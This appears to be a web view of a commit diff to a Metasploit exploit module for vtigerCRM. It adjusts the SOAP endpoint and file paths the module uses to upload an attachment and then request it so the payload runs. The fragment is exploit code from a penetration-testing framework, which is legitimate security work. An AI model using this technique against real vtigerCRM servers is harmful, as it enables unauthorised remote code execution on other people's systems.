Land #2998, @bit4bit's fix for the vtigercrm exploit
commit
998fa06912
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("#{peer} - Executing payload...")
|
||||
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
|
||||
send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)
|
||||
end
|
||||
|
||||
def add_attachment_soap(file_name, file_data)
|
||||
|
@ -170,8 +170,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def send_soap_request(soap_data)
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
|
||||
'uri' => normalize_uri(target_uri.path, 'vtigerservice.php'),
|
||||
'method' => 'POST',
|
||||
'vars_get' => { 'service' => 'outlook' },
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'data' => soap_data
|
||||
})
|
||||
|
|
Loading…
Reference in New Issue